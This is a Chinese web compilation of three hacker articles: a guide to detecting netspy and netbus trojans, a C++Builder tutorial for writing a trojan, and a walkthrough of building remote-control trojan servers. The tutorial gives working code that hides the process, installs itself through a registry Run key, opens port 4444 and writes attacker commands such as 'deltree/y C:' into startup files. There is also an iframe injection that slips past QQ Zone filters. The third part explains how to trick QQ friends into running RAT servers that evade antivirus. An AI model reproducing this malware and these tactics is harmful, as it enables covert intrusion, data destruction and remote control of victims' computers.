篇一:黑客木马入侵个人电脑的方法
黑客木马入侵个人电脑的方法
大家好,我是奇奇,现在攻击个人电脑的木马软件很多,功能比以前多了,使用也比以前方便多了,所以危害也比以前大了,奇奇发现很多人中了木马自己还不知道,我就写了一点心得,给大家作个参考。
要想使自己的电脑安全,就好扎好自己的篱笆,看好自己的门,电脑也有自己的门,我们叫它端口。
你在网络上冲浪,别人和你聊天,你发电子邮件,必须要有共同的协议,这个协议就是TCP/IP协议,任何网络软件的通讯都基于TCP/IP协议。
如果把互联网比作公路网,电脑就是路边的房屋,房屋要有门你才可以进出TCP/IP协议规定,电脑可以有256乘以256扇门,即从0到65535号“门”,TCP/IP协议把它叫作“端口”。
当你发电子邮件的时候,E-mail软件把信件送到了邮件服务器的25号端口,当你收信的时候,E-mail软件是从邮件服务器的110号端口这扇门进去取信的,你现在看到的我写的东西,是进入服务器的80端口。新安装好的个人电脑打开的端口号是139端口,你上网的时候,就是通过这个端口与外界联系的。黑客不是神仙,他也是通过端口进入你的电脑的。
黑客是怎么样进入你的电脑的呢?当然也是基于TCP/IP协议通过某个端口进入你的个人电脑的。
如果你的电脑设置了共享目录,那么黑客就可以通过139端口进入你的电脑,注意!WINDOWS有个缺陷,就算你的共享目录设置了多少长的密码,几秒钟时间就可以进入你的电脑,所以,你最好不要设置共享目录,不允许别人浏览你的电脑上的资料。
除了139端口以外,如果没有别的端口是开放的,黑客就不能入侵你的个人电脑。那么黑客是怎么样才会进到你的电脑中来的呢?答案是通过特洛伊木马进入你的电脑。
如果你不小心运行了特洛伊木马,你的电脑的某个端口就会开放,黑客就通过这个端口进入你的电脑。
举个例子,有一种典型的木马软件,叫做netspy.exe。如果你不小心运行了netspy.exe,那么它就会告诉WINDOWS,以后每次开电脑的时候都要运行它,然后,netspy.exe又在你的电脑上开了一扇“门”,“门”的编号是7306端口,如果黑客知道你的7306端口是开放的话,就可以用软件偷偷进入到你的电脑中来了。
特洛伊木马本身就是为了入侵个人电脑而做的,藏在电脑中和工作的时候是很隐蔽的,它的运行和黑客的入侵,不会在电脑的屏幕上显示出任何痕迹。WINDOWS本身没有监视网络的软件,所以不借助软件,是不知道特洛伊木马的存在和黑客的入侵。
接下来,奇奇就让你利用软件如何发现自己电脑中的木马。
奇奇再以netspy.exe为例,现在知道netspy.exe打开了电脑的7306端口,要想知道自己的电脑是不是中netspy.exe,只要敲敲7306这扇“门”就可以了。
你先打开C:\WINDOWS\WINIPCFG.EXE程序,找到自己的IP地址(比如你的IP地址是
10.10.10.10),然后打开浏览器,在浏览器的地址栏中输入 http://10.10.10.10:7306/,如果浏览器告诉你连接不上,说明你的电脑的7306端口没有开放,如果浏览器能连接上,并且在浏览器中跳出一排英文字,说的netspy.exe的版本,那么你的电脑中了netspy.exe木马了。 这是最简单最直接的办法,但是需要你知道各种木马所开放的端口,奇奇已知下列端口是木马开放的:7306、7307、7308、12345、12345、12346、31337、6680、8111、9910。
但是就算你熟悉了所有已知木马端口,也还是不能完全防范这些木马的,我们需要进一步查找木马。
奇奇曾经做了一个试验:我知道netspy.exe开放的是7306端口,于是我用工具把它的端口修改了,经过修改的木马开放的是7777端口了,你现在再用老办法是找不到netspy.exe木马了。于是我们可以用扫描自己的电脑的办法看看电脑有多少端口开放着,并且再分析这些开放的端口。
前面讲了电脑的端口是从0到65535为止,其中139端口是正常的,首先找个端口扫描器,奇奇推荐“代理猎手”,你上网以后,找到自己的IP地址,现在请关闭正在运行的网络软件,因为可能开放的端口会被误认为是木马的端口,然后让代理猎手对0到65535端口扫描,如果除了139端口以外还有其他的端口开放,那么很可能是木马造成的。
排除了139端口以外的端口,你可以进一步分析了,用浏览器进入这个端口看看,它会做出什么样的反映,你可以根据情况再判断了。
扫描这么多端口是不是很累,需要半个多小时傻等了,现在好了,我汉化了一个线程监视器,Tcpview.exe可以看电脑有什么端口是开放的,除了139端口以外,还有别的端口开放,你就可以分析了,如果判定自己的电脑中了木马,那么,你就得在硬盘上删除木马最简单的办法当然是用杀毒软件删除木马了,Netvrv病毒防护墙可以帮你删除netspy.exe和bo.exe木马,但是不能删除netbus木马。下面就netbus木马为例讲讲删除的经过。
简单介绍一下netbus木马,netbus木马的客户端有两种,开放的都是12345端口,一种以Mring.exe为代表(472,576字节),一种以SysEdit.exe为代表(494,592字节)。
Mring.exe一旦被运行以后,Mring.exe就告诉WINDOWS,每次启动就将它运行,WINDOWS将它放在了注册表中,你可以打开C:\WINDOWS\REGEDIT.EXE进入HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run找到Mring.exe然后删除这个健值,你再到WINDOWS中找到Mring.exe删除。注意了,Mring.exe可能会被黑客改变名字,字节长度也被改变了,但是在注册表中的位置不会改变,你可以到注册表的这个位置去找。
另外,你可以找包含有“netbus”字符的可执行文件,再看字节的长度,我查过了,WINDOWS和其他的一些应用软件没有包含“netbus”字符的,被你找到的文件多半就是Mring.exe的变种。
SysEdit.exe被运行以后,并不加到WINDOWS的注册表中,也不会自动挂到其他程序中,于是有人认为这是傻瓜木马,奇奇倒认为这是最最可恶、最最阴险的木马。别的木马被加到了注册表中,你就有痕迹可查了,就连专家们认为最最凶恶的BO木马也可以轻而易举地被我们从注册表中删除。
而SysEdit.exe要是挂在其他的软件中,只要你不碰这个软件,SysEdit.exe也就不发作,一旦运行了被安装SysEdit.exe的程序,SysEdit.exe也同时启动了。奇奇在自己的电脑中做了这样一个实验,将SysEdit.exe和C:\WINDOWS\SYSTEM\Abcwin.exe捆绑起来,Abcwin.exe是智能ABC输入法,当我开启电脑到上网,只要没有打开智能ABC输入法打字聊天,SysEdit.exe也就没有被运行,你就不能进入我的12345端口,如果我什么时候想打字了,一旦启动智能ABC输入法(Abcwin.exe),那么捆绑在Abcwin.exe上的SysEdit.exe也同时被运行了,我的12345端口被打开,别人就可以黑到我的电脑中来了。同样道理,SysEdit.exe可以被捆绑到网络传呼机、信箱工具等网络工具上,甚至可以捆绑到拨号工具上,电脑中的几百的程序中,你知道会在什么地方发现它吗?所以我说这是最最阴险的木马,让人防不胜防。
有的时候知道自己中了netbus木马,特别是SysEdit.exe,能发现12345端口被开放,并且可以用netbus客户端软件进入自己的电脑,却不知道木马在什么地方。这时候,你可以检视内存,请打开C:\WINDOWS\DRWATSON.EXE,然后对内存拍照,查看“高级视图”中的“任务”标签,“程序”栏中列出的就是正在运行的程序,要是发现可疑的程序,再看“路径”栏,找到这个程序,分析它,你就知道是不是木马了。SysEdit.exe虽然可以隐藏在其他的程序后面,但是在C:\WINDOWS\DRWATSON.EXE中还是暴露了。
好了,来回顾一下,要知道自己的电脑中有没有木马,只要看看有没有可疑端口被开放,用代理猎手、Tcpview.exe都可以知道。要查找木马,一是可以到注册表的指定位置去找,二是可以查找包含相应的可执行程序,比如,被开放的端口是7306,就找包含“netspy”的可执行程序,三是检视内存,看有没有可以的程序在内存中。
你的电脑上的木马,来源有两种,一种是你自己不小心,运行了包含有木马的程序,另一种情况是,“网友”送给你“好玩”的程序。所以,你以后要小心了,要弄清楚了是什么程序再运行,安装容易排除难呀。
排除了木马以后,你就可以监视端口,悄悄等待黑客的来临介绍两个软件,
首先是NukeNabber,它是端口监视器,你告诉NukeNabber需要监视7306端口,如果有人接触这个端口,就马上报警。在别人看来,你的电脑的7306端口是开放的,但是7306不是由netspy控制了,当NukeNabber发现有人接触7306端口或者试图进入你的7306端口,马上报警,你可以在NukeNabber上面看到黑客对你做了些什么,黑客的IP地址是哪里,然后,你就可以反过来攻击黑客了。当NukeNabber监视139的时候,你就可以知道谁在用IP炸弹炸你。
另外提一下,如果NukeNabber告诉你不能监视7306端口,说这个端口已经被占用了,那么说明你的电脑中存在netspy了。
第二个软件就是Tcpview.exe,这个软件是线程监视器,你可以用它来查看有多少端口是开放的,谁在和你通讯,对方的IP地址和端口分别是什么。
篇二:黑客技术:木马是如何编写的(一)
黑客技术:木马是如何编写的(一)
周侃·天极e企业<br>
<br>
特洛依木马这个名词大家应该不陌生,自从98年“死牛崇拜”黑客小组公布Back Orifice以来,木马犹如平地上的惊雷,使在Dos——Windows时代中长大的中国网民从五彩缤纷的网络之梦中惊醒,终于认识到的网络也有它邪恶的一面,一时间人心惶惶。<br> <br>
我那时在《电脑报》上看到一篇文章,大意是一个菜鸟被人用BO控制了,吓得整天吃不下饭、睡不着觉、上不了网,到处求救!要知道,木马(Trojan)的历史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木马是由一些玩程式(主要是C)水平很高的年轻人(主要是老美)用C或Shell语言编写的,基本是用来窃取登陆主机的口令,以取得更高的权限。那时木马的主要方法是诱骗——先修改你的.profile文件,植入木马;当你登陆时将你敲入的口令字符存入一个文件,用Email的形式发到攻击者的邮箱里。国内的年轻人大都是在盗版Dos的熏陶下长大的,对网络可以说很陌生。直到Win9x横空出世,尤其是WinNt的普及,大大推动了网络事业的发展的时候,BO这个用三年后的眼光看起来有点简单甚至可以说是简陋的木马(甚至在Win9x的“关闭程序”对话框可以看到进程)给了当时中国人极大的震撼,它在中国的网络安全方面可以说是一个划时代的软件。<br> <br>
自己编写木马,听起来很Cool是不是?!木马一定是由两部分组成——服务器程序(Server)和客户端程序(Client),服务器负责打开攻击的道路,就像一个内奸特务;客户端负责攻击目标,两者需要一定的网络协议来进行通讯(一般是TCP/IP协议)。为了让大家更好的了解木马攻击技术,破除木马的神秘感,我就来粗略讲一讲编写木马的技术并顺便编写一个例子木马,使大家能更好地防范和查杀各种已知和未知的木马。<br> <br>
首先是编程工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在木马的基本原理上,我们选用可视化的BCB;Delphi也不错,但缺陷是不能继承已有的资源(如“死牛崇拜”黑客小组公布的BO2000源代码,是VC编写的,网上俯拾皆是);VB嘛,谈都不谈——难道你还给受害者传一个1兆多的动态链接库——Msvbvm60.dll吗?<br>
<br>
启动C++Builder 5.0企业版,新建一个工程,添加三个VCL控件:一个是Internet页中的Server Socket,另两个是Fastnet页中的NMFTP和NMSMTP。Server Socket的功能是用来使本程序变成一个服务器程序,可以对外服务(对攻击者敞开大门)。Socket最初是在Unix上出现的,后来微软将它引入了Windows中(包括Win98和WinNt);后两个控件的作用是用来使程序具有FTP(File Transfer Protocol文件传输协议)和SMTP(Simple Mail Transfer Protocol简单邮件传输协议)功能,大家一看都知道是使软件具有上传下载功能和发邮件功能的控件。<br>
<br>
Form窗体是可视的,这当然是不可思议的。不光占去了大量的空间(光一个Form就
有300K之大),而且使软件可见,根本没什么作用。因此实际写木马时可以用一些技巧使程序不包含Form,就像Delphi用过程实现的小程序一般只有17K左右那样。<br> <br>
我们首先应该让我们的程序能够隐身。双击Form,首先在FormCreate事件中添加可使木马在Win9x的“关闭程序”对话框中隐藏的代码。这看起来很神秘,其实说穿了不过是一种被称之为Service的后台进程,它可以运行在较高的优先级下,可以说是非常靠近系统核心的设备驱动程序中的那一种。因此,只要将我们的程序在进程数据库中用RegisterServiceProcess()函数注册成服务进程(Service Process)就可以了。不过该函数的声明在Borland预先打包的头文件中没有,那么我们只好自己来声明这个位于KERNEL32.DLL中的鸟函数了。<br>
<br>
首先判断目标机的操作系统是Win9x还是WinNt:<br>
<br>
{<br>
DWORD dwVersion = GetVersion();<br>
// 得到操作系统的版本号<br>
if (dwVersion >= 0x80000000)<br>
// 操作系统是Win9x,不是WinNt<br>
{ <br>
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);<br>
//定义RegisterServiceProcess()函数的原型<br>
HINSTANCE hDLL;<br>
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;<br>
hDLL = LoadLibrary("KERNEL32");<br>
//加载RegisterServiceProcess()函数所在的动态链接库KERNEL32.DLL<br>
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");<br>
//得到RegisterServiceProcess()函数的地址<br>
lpRegisterServiceProcess(GetCurrentProcessId(),1);<br>
//执行RegisterServiceProcess()函数,隐藏本进程<br>
FreeLibrary(hDLL);<br>
//卸载动态链接库<br>
}<br>
}<br>
<br>
这样就终于可以隐身了(害我敲了这么多代码!)。为什么要判断操作系统呢?因为WinNt中的进程管理器可以对当前进程一览无余,因此没必要在WinNt下也使用以上代码(不过你可以使用其他的方法,这个留到后面再讲)。<br>
<br>
接着再将自己拷贝一份到%System%目录下,例如:C:\Windows\System,并修改注册表,以便启动时自动加载:<br>
<br>
{ <br>
char TempPath[MAX_PATH];<br>
//定义一个变量<br>
GetSystemDirectory(TempPath ,MAX_PATH);<br>
//TempPath是system目录缓冲区的地址,MAX_PATH是缓冲区的大小,得到目标机的System目录路径<br>
SystemPath=AnsiString(TempPath);<br>
//格式化TempPath字符串,使之成为能供编译器使用的样式<br>
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);<br> //将自己拷贝到%System%目录下,并改名为Tapi32.exe,伪装起来<br>
Registry=new TRegistry;<br>
//定义一个TRegistry对象,准备修改注册表,这一步必不可少<br>
Registry->RootKey=HKEY_LOCAL_MACHINE;<br>
//设置主键为HKEY_LOCAL_MACHINE<br>
Registry->OpenKey("Software\\Microsoft\\Windows\\<br>
CurrentVersion\\Run",TRUE);<br>
//打开键值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就创建之<br> try<br>
{<br>
//如果以下语句发生异常,跳至catch,以避免程序崩溃<br>
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")<br>
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");<br>
//查找是否有“crossbow”字样的键值,并且是否为拷贝的目录%System%+Tapi32.exe<br>
//如果不是,就写入以上键值和内容<br>
}<br>
catch(...)<br>
{<br>
//如果有错误,什么也不做<br>
}<br>
}<br>
<br>
好,FormCreate过程完成了,这样每次启动都可以自动加载Tapi32.exe,并且在“关闭程序”对话框中看不见本进程了,木马的雏形初现。<br>
<br>
接着选中ServerSocket控件,在左边的Object Inspector中将Active改为true,这样程序一启动就打开特定端口,处于服务器工作状态。再将Port填入4444,这是木马的端口号,当然你也可以用别的。但是你要注意不要用1024以下的低端端口,因为这样不但可能会与基本网络协议使用的端口相冲突,而且很容易被发觉,因此尽量使用1024以上的高端端口(不过也有这样一种技术,它故意使用特定端口,因为如果引起冲突,Windows也不会报错 ^_^)。你可以看一看TNMFTP控件使用的端口,是21号端口,这是FTP协议的专用控制端口(FTP Control Port);同理TNMSMTP的25号端口也是SMTP协议的专用端口。<br> <br>
再选中ServerSocket控件,点击Events页,双击OnClientRead事件,敲入以下代码:<br>
<br>
{<br>
FILE *fp=NULL;<br>
char * content;<br>
int times_of_try;<br>
char TempFile[MAX_PATH];<br>
//定义了一堆待会儿要用到的变量<br>
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());<br> //在%System%下建立一个文本文件Win369.bat,作为临时文件使用<br>
AnsiString temp=Socket->ReceiveText();<br>
//接收客户端(攻击者,也就是你自己)传来的数据<br>
}<br>
<br>
好,大门敞开了!接着就是修改目标机的各种配置了!^_^ 首先我们来修改Autoexec.bat和Config.sys吧:<br>
<br>
{<br>
if(temp.SubString(0,9)=="edit conf")<br>
//如果接受到的字符串的前9个字符是“edit conf”<br>
{<br>
int number=temp.Length();<br>
//得到字符串的长度<br>
int file_name=atoi((temp.SubString(11,1)).c_str());<br>
//将第11个字符转换成integer型,存入file_name变量<br>
//为什么要取第11个字符,因为第10个字符是空格字符<br>
content=(temp.SubString(12,number-11)+'\n').c_str();<br>
//余下的字符串将被作为写入的内容写入目标文件<br>
FILE *fp=NULL;<br>
char filename[20];<br>
chmod("c:\\autoexec.bat",S_IREAD|S_IWRITE);<br>
chmod("c:\\config.sys",S_IREAD|S_IWRITE);<br>
//将两个目标文件的属性改为可读可写<br>
if(file_name==1)<br>
sprintf(filename,"%s","c:\\autoexec.bat");<br>
//如果第11个字符是1,就把Autoexec.bat格式化<br>
else if(file_name==2)<br>
sprintf(filename,"%s","c:\\config.sys");<br>
//如果第11个字符是1,就把Config.sys格式化<br>
times_of_try=0;<br>
//定义计数器<br>
while(fp==NULL)<br>
{<br>
//如果指针是空<br>
fp=fopen(filename,"a+");<br>
//如果文件不存在,创建之;如果存在,准备在其后添加<br>
//如果出错,文件指针为空,这样就会重复<br>
times_of_try=times_of_try+1;<br>
//计数器加1<br>
if(times_of_try>100)<br>
{<br>
//如果已经试了100次了,仍未成功<br>
Socket->SendText("Fail By Open File");<br>
//就发回“Fail By Open File”的错误信息<br>
goto END;<br>
//跳至END处<br>
}<br>
}<br>
fwrite(content,sizeof(char),strlen(content),fp);<br>
//写入添加的语句,例如deltree/y C:或者format/q/autotest C:,够毒吧?!<br> fclose(fp);<br>
//写完后关闭目标文件<br>
Socket->SendText("Sucess");<br>
//然后发回“Success”的成功信息<br>
}<br>
}<br>
<br>
你现在可以通过网络来察看目标机上的这两个文件了,并且还可以向里面随意添加任何命令。呵呵,这只不过是牛刀小试罢了。朋友,别走开!(
QQ空间插入网页木马
今天我来做个 破解QQ空间插入网页木马的现在腾讯 已经代码
封了很多QQ空间代码了就如 以前 <iframe src="木马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>插入网页木马的代码也早被封了
纵横qzone界最叼的代码,已经禁用,突破方法!
iframe代码已经禁用,这是众所周知的,但现在有突破禁用的方法,绝对够酷!
代码如下:
<div id=DI><img src="javascript:DI.innerHTML='<iframe src=木马地址 width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>'" style=display:none></div>
我现在用黑客基地 [url]http://hackbase.com/[/url]地址示范给大家看看
好了不打字了
大家看我操作
篇三:黑客如何运用木马实施远程控制
黑客如何运用木马实施远程控制
黑客技术
2009-10-26 12:53阅读99评论1
字号: 大 中 小
喜欢在网上浏览新闻的人,一定会经常看到某人隐私被黑客盗窃,或者以此来要挟受害人的事情。这里大家可能要问了,他们是如何做到的呢?其实答案很简单,只不过是利用了远程木马控制实现,下面笔
者将会针对黑客圈子里,常见的远程木马进行详细讲解。
一、穿透力极强的Byshell木马
Byshell是一个无进程、无DLL、无启动项的、集多种Rootkit技术特征的独立功能远程控制后门程序(Backdoor)。其利用线程注射DLL到系统进程,解除DLL映射并删除自身文件和启动项,关机时恢
复。它是内核级的木马程序,主要部分工作在Ring0,因此有很强的隐蔽性和杀伤力。
1.配置Byshell木马服务端
要想配置Byshell木马服务端,我们首先打开下载到本地的“Byshell客户端”程序,在所弹出的“监
听端口”对话框内,输入其木马想要监听的端口,默认设置为2007(如图1)。
图1
修改完毕后,进入到“Byshell木马客户端”界面,在顶端的工具栏内,单击“配置服务端”按钮,此
时就会打开“配置服务端”的对话框(如图2)。
图2
在“IP通知地址”标签处,输入自己空间的访问地址,“IP或者DNS域名”标签,则输入自己的本机IP,另外客户端口输入的数字,要与此前设置的监听端口一致,否则会出现肉鸡无法上线的情况。然后在单击“生成”按钮,在弹出的“另存为”对话框内,选择好所要生成的路径,单击“确定”按钮,就可使其服务
端生成完毕。
2.让主动防御纷纷落马
为了能够测试Byshell木马的威力,我们这里打开杀毒软件的所有“主动防御”选项,并且将其安全级别提高到最高,然后在运行一下刚生成好的Byshell木马服务端,此时你会发现杀毒软件竟然将它的启动视而不见,并且在客户端还可以看到中招的机器上线。如果你想对肉鸡进行控制,我们可以选择其上线的机器,然后在上方单击工具栏里的“相关”按钮,如这里单击“文件管理”按钮,就可打开被控制机器的“文件管理”对话框,从中我们可以查阅该肉鸡里的所有硬盘文件。另外最后要想卸载掉远程服务端,只要在“客户
端”界面内,右击上线肉鸡IP栏,选择“远程卸载”选项,就可将其服务端从受害者系统里摘除。
总结:其实Byshell木马通过对当前系统的SSDT表进行破坏,所使用系统原来的SSDT表覆盖现在的SSDT表,才使杀毒软件的主动防御功能实效的。如果你想从数据上了解Byshell木马的穿透,可以使用Wsyscheck等工具查看系统中的SSDT表,这样就会清楚的看见杀毒软件在正常情况下,与被木马穿
透的表是不同的了。
二、上线速度超快的暗组远控木马
暗组远控木马,是一款体积非常小的控制软件,并且它还具备着较强的穿透防火墙和杀毒软件的主动防御能力。另外由于这款软件很偏门,一般人都不太知道,所以其所生成的最新服务端,无须进行加密就
可以逃脱一些杀毒软件的查杀。
1. 利用客户端生成服务端
由于暗组远控软件功能不是很强大,所以客户端界面很简单,主要有顶端三个功能按钮,如:“生成服务端、设置、监听”按钮构成,很适合新手操作。另外暗组远控木马与其他同类软件一样,也是通过其客户端来生成服务端。这里我们依然在其客户端界面内,单击“生成服务端”按钮,此时在弹出的“生成服务端”
对话框内(如图3)。
图3
新手只要在上线域名那里换成自己的固定IP地址,然后单击“生成”按钮,选择好保存路径就可将其生
成成功了。
2. 偏门木马杀毒软件不易发现
之前笔者已经说过了,貌似这种不出名的木马,即使有时不加密也不会被查杀掉,而像灰鸽子、黑洞等名声在外的木马,即使加密也用不了多久。因此我们只要通过欺骗QQ好友看照片的手段,让他(她)运
行配置好的木马服务端,然后单击“开始监听”按钮,其主机就会立刻在客户端上线了(如图4)。
图4
此时你只要选择该上线的肉鸡,就可以对相关肉鸡进行远程控制,而具体控制功能都集成在了右键上
面,大家可以根据需要进行选择即可。
总结:暗组远控木马与Rdmin差不多,其不仅可以观看到操作者的一举一动,就连其桌面的也可一同进行控制,这要比前者介绍的Byshell好的多。另外如果你想为自己的网站刷流量,还可以通过右键启动
看看增加批量打开网站,从而可以为自己的网站获取更多的点击率。
三、新兴的东南网安远程控制软件
东南网安远程控制是由东南大学网络安全联盟,开发的一款远程控制软件,其界面友好简单,左侧有
一排错落有致的功能按钮,我要想对肉鸡进行控制,只需使用这几个按钮便可完成操作(如图5)。
图5
1. 配置木马服务端
打开“客户端”程序,默认选择的是左侧“上线主机”标签,由于还有配置服务端程序,所以更谈不上有肉鸡上线。因此这里单击“配置服务端”标签,在所显示的界面内,根据标签的提示信息,将自己电脑信息输入便可,然后单击“生成”按钮,此配置的服务端,就会自动生成在该软件的同一目录下,并且默认服务端名称为SEU_server。然后以各种欺骗的手段或者其他方法让受害人运行,这样其主机才会在客户端显示上
线(如图6)。
免费论文网友情提示:本网站所有内容为共享上传提供,不涉及任何商业利益,本站对此不承担任何保证责任!
Copyright © www.csmayi.cn Corporation, All Rights Reserved 共享时代 共享你我他 版权所有